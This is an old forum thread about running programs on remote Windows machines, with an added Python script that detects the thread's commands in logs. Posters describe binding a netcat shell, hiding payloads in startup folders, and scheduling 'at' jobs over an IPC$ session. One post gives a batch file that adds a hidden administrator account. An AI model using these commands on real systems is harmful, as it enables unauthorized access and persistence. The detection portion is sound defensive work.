Alexander01
So I mean something like psexec, but with an option where I can specify the user account that will execute the executable.
JeiAr
Maybe using the "at" command?

CODE
The AT command schedules commands and programs to run on a computer at
a specified time and date. The Schedule service must be running to use
the AT command.

AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
   [ /EVERY:date[,...] | /NEXT:date[,...]] "command"

\\computername     Specifies a remote computer. Commands are scheduled on the
                  local computer if this parameter is omitted.
id                 Is an identification number assigned to a scheduled
                  command.
/delete            Cancels a scheduled command. If id is omitted, all the
                  scheduled commands on the computer are canceled.
/yes               Used with cancel all jobs command when no further
                  confirmation is desired.
time               Specifies the time when command is to run.
/interactive       Allows the job to interact with the desktop of the user
                  who is logged on at the time the job runs.
/every:date[,...]  Runs the command on each specified day(s) of the week or
                  month. If date is omitted, the current day of the month
                  is assumed.
/next:date[,...]   Runs the specified command on the next occurrence of the
                  day (for example, next Thursday).  If date is omitted, the
                  current day of the month is assumed.
"command"          Is the Windows NT command, or batch program to be run.
andydis
If you've got psexec, upload nc.exe, bind it to a port, get a shell, and for a user-specified run you want the good old-fashioned Windows profiles.

If XP:
c:\documents and settings\user\start menu\programs\startup

TIP: put a shortcut there, or even what you want to do, with a name of alt+0255 for no name, then hide it.

NT is c:\winnt\profiles, I think.

Another option is to enable remote registry or create a reg entry using a .reg file.
Alexander01
Yeah, but I need to make a whole schedule for executing it.
ringo
AT is at best flaky, but if you are lucky you can get it to work for you.

1) Use the technique from andydis to create the session

2) AT will allow you to schedule whatever kiddie stuff you want to exe using whatever local account on the target. Create a batch file with the commands for AT (see the help quoted from JeiAr).

3) Put that bat in the startup folder on the target box (once again, see the entry from andydis)

This will get you:
  • On the box
  • very noisy scheduled task
  • run as a specified user

You will just have to wait for the next logon or reboot, which for Windows should happen at least once daily.
sizza
Hey, I don't understand none of this. I want a program that can execute a file on another PC... how can I do that w/o freezing?
ringo
QUOTE (sizza @ Apr 5 2004, 12:53 AM)
Hey, I don't understand none of this. I want a program that can execute a file on another PC... how can I do that w/o freezing?

How about taking some time to learn the way that networks and host systems communicate? If you want a canned program to get you on a system, you will need the assistance of the owner/user of that box by having them install a backdoor or similar program.

Long answer is: To run an executable on a remote system, you need to know at least these three items about the system: What OS is running, an account on the target and the password to that account. You might use a bit of social engineering to get that information, aggregate the information from disparate information sources or just guess. It's up to you.

If you just want a precompiled program or error-checked script or an "ImA*mEtOo*hAcKeRnOoBaNdIuSeAOL" CD ISO loaded with the latest alt.2600 archives which you will never understand, then the short answer is: Don't go away mad, just go away.

The point is that nothing is easy. Some hacks are simple, but none are easy.
willywutz
Another short answer: :>
PSEXEC can execute commands/files with specified user/pass

Usage: psexec \\computer [-u user [-p psswd]][-s][-i][-c [-f]][-d] cmd [arguments]
-u Specifies optional user name for login to remote
computer.
-p Specifies optional password for user name. If you omit this
you will be prompted to enter a hidden password.
aapje
yes, psexec is the best to execute remote files
Pro21
net use \\ip\IPC$ "pass" "/user:login"

at \\ip time command

ex : at \\66.66.66.66 02:14am c:\windows\system32\start.bat

start.bat :

net user toto toto /add
net localgroup administrators toto /add (/domain)

It's an example for a remote schedule, needn't use psexec.

QUOTE
yes, psexec is the best to execute remote files

Wrong, At is the best. It's a Windows integrated tool. This is the best especially when psexec failed to open the remote shell.
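
For defenders, the command lines posted in this thread (net use to IPC$ with explicit credentials, at against a remote host, net user /add, net localgroup administrators /add, psexec -u) all appear in process-creation logging when command-line auditing is enabled. The following is an added example, not part of the original thread: it matches those patterns in constructed log tuples and correlates an IPC$ session with a later remote at job from the same source. The event layout, rule names, host names, addresses and passwords are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: (timestamp, source host, user, command line), the fields
# process-creation logging with command-line auditing would provide.
SAMPLE_EVENTS = [
    ("2004-04-05 02:10:01", "WS01", "alice", r'net use \\10.0.0.5\IPC$ "EXAMPLE-PW" "/user:login"'),
    ("2004-04-05 02:11:30", "WS01", "alice", r'at \\10.0.0.5 02:14am c:\windows\system32\start.bat'),
    ("2004-04-05 02:14:00", "SRV05", "SYSTEM", r'net user toto toto /add'),
    ("2004-04-05 02:14:01", "SRV05", "SYSTEM", r'net localgroup administrators toto /add'),
    ("2004-04-05 09:00:00", "WS02", "bob", r'net use \\fileserver\share'),
    ("2004-04-05 09:05:00", "WS03", "carol", r'psexec \\10.0.0.9 -u admin -p EXAMPLE-PW cmd'),
]

# Hypothetical rule names; each regex covers one command shape from the thread.
RULES = [
    ("ipc_session_creds", re.compile(r'^\s*net1?(\.exe)?\s+use\s+\\\\(?P<target>[^\s\\]+)\\ipc\$.*/user:', re.I)),
    ("remote_at_job", re.compile(r'^\s*at(\.exe)?\s+\\\\(?P<target>[^\s\\]+)\s+(?!/)\S+', re.I)),
    ("psexec_explicit_creds", re.compile(r'psexec(\.exe)?\s+\\\\(?P<target>[^\s\\]+).*\s-u\s', re.I)),
    ("local_account_added", re.compile(r'^\s*net1?(\.exe)?\s+user\s+\S+.*\s/add\b', re.I)),
    ("admin_group_member_added", re.compile(r'^\s*net1?(\.exe)?\s+localgroup\s+"?administrators"?\s+.*/add\b', re.I)),
]

def detect(events, window=timedelta(minutes=30)):
    """Return (timestamp, host, rule, target) alerts; events must be time-ordered."""
    alerts, sessions = [], {}
    for ts, host, user, cmd in events:
        when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        for name, rx in RULES:
            m = rx.search(cmd)
            if not m:
                continue
            target = m.groupdict().get("target")  # None for purely local commands
            alerts.append((ts, host, name, target))
            key = (host, (target or "").lower())
            if name == "ipc_session_creds":
                sessions[key] = when  # remember when this source authenticated to the target
            elif name == "remote_at_job":
                opened = sessions.get(key)
                if opened and timedelta(0) <= when - opened <= window:
                    alerts.append((ts, host, "ipc_then_at_chain", target))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The account-creation and group-change rules fire on the target host, so pairing them with the source-side chain alert by time gives the full picture of one remote scheduling event.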